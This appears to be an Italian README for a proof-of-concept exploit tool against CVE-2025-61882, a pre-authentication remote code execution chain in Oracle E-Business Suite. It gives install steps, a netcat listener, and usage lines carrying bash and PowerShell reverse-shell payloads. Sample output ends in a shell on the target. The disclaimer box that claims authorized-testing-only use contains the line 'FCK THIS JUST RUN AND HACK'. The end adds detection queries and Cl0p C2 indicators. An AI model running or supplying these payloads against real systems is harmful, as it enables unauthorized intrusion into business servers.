
Exploit per CVE-2025-61882, una RCE critica pre-autenticazione in Oracle E-Business Suite. Combina SSRF, iniezione CRLF, HTTP smuggling e iniezione XSLT per l'esecuzione remota di codice senza autenticazione.
Consulta il nostro post sul blog per i dettagli tecnici
QUESTO STRUMENTO È SOLO PER TEST DI SICUREZZA AUTORIZZATI
╔══════════════════════════════════════════════════════════════╗
║ ║
║ 🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨 ║
║ ║
║ By using this tool, you acknowledge and agree that: ║
║ ║
║ ║
║ FCK THIS JUST RUN AND HACK ║
║ ║
║ ║
║ ║
║ ║
║ ║
╚══════════════════════════════════════════════════════════════╝
Strumento di test di sicurezza per CVE-2025-61882, una vulnerabilità critica di esecuzione remota di codice pre-autenticazione che colpisce Oracle E-Business Suite.
Creato da: Mindflare
CVE-2025-61882 è una sofisticata catena di exploit che combina cinque vulnerabilità distinte:
/OA_HTML/configurator/UiServletreturn_url/OA_HTML/help/../# Clone the repository
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC
# Install dependencies
pip3 install -r requirements.txt
# Make script executable (Linux/Mac)
chmod +x cve-2025-61882-detector.py
In un terminale separato, avvia un listener netcat:
# Linux/Mac
nc -lvnp 4444
# Windows
nc.exe -lvnp 4444
Utilizzo Base (Target Linux):
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
--platform linux
Target Windows:
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
--platform windows
| Parametro | Descrizione | Richiesto | Esempio |
|---|---|---|---|
--target | URL Oracle EBS del target | Sì | http://192.168.1.22:8000 |
--lhost | Il tuo indirizzo IP (per i callback) | Sì | 192.168.1.10 |
--lport | Porta del server HTTP (serve il payload XSL) | Sì | 80 o 8080 |
--command | Comando da eseguire sul target | Sì | Vedi gli esempi sopra |
--platform | Sistema operativo del target: linux o windows | Sì | linux |
[*] Target URL: http://192.168.1.22:8000
[*] Listener IP: 192.168.1.10
[*] Listener Port: 80
[*] Platform: linux
[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully
[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$
SELECT * FROM XDO_TEMPLATES_B
WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
IOC di Rete:
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondario)
Pattern HTTP:
POST /OA_HTML/configurator/UiServletPOST /OA_HTML/SyncServletGET /OA_HTML/help/../*.jspLicenza MIT con Restrizioni per Uso Educativo - Vedi LICENSE
DICHIARAZIONE DI NON RESPONSABILITÀ: Questo software è solo per test di sicurezza autorizzati. L'accesso non autorizzato ai sistemi informatici è illegale. L'autore non si assume alcuna responsabilità per un uso improprio.
**Creato da:** Mindflare | **Ultimo aggiornamento:** ottobre 2025